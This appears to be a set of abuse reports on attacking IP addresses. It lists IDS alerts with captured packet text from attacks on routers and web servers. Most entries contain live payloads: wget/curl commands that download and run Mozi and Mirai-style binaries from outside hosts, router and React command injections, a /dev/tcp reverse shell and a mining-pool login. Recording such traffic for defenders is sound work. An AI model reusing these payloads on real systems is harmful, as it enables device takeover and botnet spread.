🇮🇳
103.175.29.59
06 Jan 2026
SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt (1:44687:3)
Time: 2026-01-05 19:48:53 (Src Port: 64188, Dst Port: 80)
Packet Text: ...
.....
[email protected] ..;
dd ...P........P. .....GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.175.29.59:58676/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Web App Attack
🇦🇺
170.64.193.67
30 Dec 2025
SERVER-WEBAPP React Server Components remote code execution attempt (1:65554:1)
Time: 2025-12-29 14:07:41 (Src Port: 37038, Dst Port: 80)
Packet Text: ...
.....
....E.......@[email protected]
dd ...P........P. .....------B1767042461223920981
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"test","_formData":{"get":"$1:constructor:constructor"}}}
------B1767042461223920981
Content-Disposition: form-data; name="1"
"$@0"
------B1767042461223920981--
Web App Attack
🇮🇹
72.146.234.81
17 Dec 2025
SERVER-WEBAPP TP-Link Archer Router command injection attempt (1:300523:2)
Time: 2025-12-17 03:51:49 (Src Port: 53174, Dst Port: 80)
Packet Text: ...
.....
[email protected]
dd ...P........P. .....operation=write&country=$(id>`curl -fsSL http://45.11.229.11/bins.sh -o /tmp/.sh || wget -q http://45.11.229.11/bins.sh -O /tmp/.sh; chmod +x /tmp/.sh; /tmp/.sh &`)
Web App Attack
🇨🇦
4.229.225.169
16 Dec 2025
Time: 2025-12-16 07:54:05 (Src Port: 40372, Dst Port: 80)
Packet Text: ...
.....
....E.......@.......
dd ...P........P. .....------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('powershell -c \"40734*40199\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Web App Attack
🇺🇸
216.108.237.50
12 Dec 2025
Time: 2025-12-11 23:29:58
(Src Port: 42738, Dst Port: 80)
Packet Text: ...
.....
....E.."[email protected]
dd ...P........P. .....POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 63.225.36.208:80
Upgrade-Insecure-Requests: 1
Accept: */*
User-Agent: libredtail-http
Connection: keep-alive
Content-Type: text/plain
Content-Length: 119
Web App Attack
🇧🇬
78.128.114.22
11 Dec 2025
30+ events from this IP between 12/10 15:00 - 12/10 18:00
Many attempts on port 108xx range
Hacking
🇮🇳
117.235.123.159
29 Sep 2025
Time 2025-09-28 16:21:13 (Src Port: 43597, Dst Port: 8443)
Packet Text: ...
.....
[email protected] .{.
dj..M .........P. .....GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://117.235.123.159:37633/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m HTTP/1.0
Web App Attack
🇳🇿
27.252.36.174
18 Sep 2025
Time 2025-09-18 06:30:21 (Src Port: 35034, Dst Port: 80)
Packet Text:
...
.....
....E.......@.....$.
dd ...P........P. .....GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
Hacking
🇬🇧
5.66.198.74
08 Sep 2025
Time: 2025-09-05 23:02:57 (Src Port: 52115, Dst Port: 80)
SERVER-WEBAPP TP-Link Archer Router command injection attempt (1:300786:1)
Packet Text: ...
.....
[email protected]
dd ...P........P. .....GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
Hacking
🇦🇺
182.239.174.39
14 May 2025
MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
Time: 2025-05-09 21:29:02 (Src Port: 43950, Dst Port: 80)
Packet Text: ...
.....
....E.......@......'
dd ...P........P. .....User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Hacking
🇦🇺
182.239.177.121
24 Apr 2025
MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
Time: 2025-04-23 12:04:04 (Src Port: 37382, Dst Port: 80)
HTTP URI /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws
Packet Text: ...
.....
[email protected]
dd ...P........P. .....User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Hacking
🇺🇸
209.141.50.64
24 Apr 2025
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time: 2025-04-24 05:29:15 (Src Port: 39188, Dst Port: 9034)
Packet Text: ........0.`...E....1........2@D.....#J....orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://209.141.34.106/20oel/k03ldc.mpsl; chmod +x k03ldc.mpsl; ./k03ldc.mpsl realtek; #
Hacking
🇮🇹
84.221.242.62
18 Apr 2025
Time: 2025-04-18 06:51:53
(Src Port: 56997, Dst Port: 80)
HTTP URI /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws
Packet Text: ...
.....
[email protected] ..>
dd ...P........P. .....User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Hacking
🇮🇳
117.219.142.185
26 Dec 2024
SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt (1:44687:3)
Time: 2024-12-25 23:42:49 - (Src Port: 47287, Dst Port: 80)
Packet Text: ...
.....
....E..([email protected] ...
dd ...P........P. .....
Hacking
🇮🇳
202.21.42.108
11 Dec 2024
MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
Time 2024-12-11 06:53:34 (Src Port: 46763, Dst Port: 80)
Packet Text: ...
.....
....E.......@.....*l
dd ...P........P. .....Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
Hacking
🇵🇱
91.193.18.13
04 Dec 2024
Source Port: TCP 47059 / Destination TCP 25
CnC Connected Security Intelligence Event - CnC The host may be under remote control 2024-12-04 06:57:39
Similar event on Internal IPs
Hacking
🇻🇳
45.124.95.225
05 Nov 2024
Seen in a callback packet text from IP 146.103.38.222
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time: 2024-11-05 08:49:16 (Src Port: 54576, Dst Port: 9034)
Packet Text: ..]....K.._...E....1.......g&.?.-..0#J....orf;cd /tmp; rm -rf main_mpsl; /bin/busybox wget http://45.124.95.225/main_mpsl; chmod +x main_mpsl; ./main_mpsl realtek; #
Hacking
🇱🇹
146.103.38.222
05 Nov 2024
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time: 2024-11-05 08:49:16 (Src Port: 54576, Dst Port: 9034)
Packet Text: ..]....K.._...E....1.......g&.?.-..0#J....orf;cd /tmp; rm -rf main_mpsl; /bin/busybox wget http://45.124.95.225/main_mpsl; chmod +x main_mpsl; ./main_mpsl realtek; #
SQL Injection
🇳🇱
213.152.161.30
21 Oct 2024
CnC Time: 2024-10-21 12:49:13
Source Port: 40125, Destination Port: 3306
Hacking
🇯🇵
164.52.24.187
04 Oct 2024
PUA-OTHER XMRig cryptocurrency mining pool connection attempt (1:45549:4)
Time: 2024-10-03 12:32:43 (Src Port: 42951, Dst Port: 25)
Packet Text: ..]....K.._...E..,[email protected] ..?.-......{.=83>............
l.....?.{"id": 1, "jsonrpc": "2.0", "method": "login", "params": { "login": "48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD", "pass": "x", "agent": "XMRig/2.6.0-beta2 (Linux x86_64) libuv/1.8.0 gcc/5.4.0"}}
Web App Attack
🇦🇺
209.38.23.48
30 Sep 2024
Time 2024-09-29 02:35:18 (Src Port: 53670, Dst Port: 80)
Packet Text: ...
.....
....E..O....@....&.0
dd ...P........P. .....<?=base64_decode("emV0YXNheWFuZw==");?>
Web App Attack
🇷🇴
45.148.10.238
17 Sep 2024
CnC traffic src port 42208 tcp dest port 443 (https) tcp
2024-09-16 14:50:01
Hacking
🇷🇺
194.113.106.241
06 Sep 2024
Time 2024-09-06 13:23:11 (Src Port: 52495, Dst Port: 9034)
Packet Text: ..]....K.._...E..h.1....X
.qj.?.-...#J.T..orf;0<&196;exec 196<>/dev/tcp/194.113.106.241/7777; sh <&196 >&196 2>&196; #
SQL Injection
🇩🇪
45.145.42.234
07 Aug 2024
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1) 5x
2024-08-07 07:57:54 Source Ports UDP 50906, 45573, 42614, 43275, 33057, 37465 > Destination port 9034
SQL Injection
🇮🇳
128.199.16.182
17 Jun 2024
Port scanning (Port 3389) on various devices.
Port Scan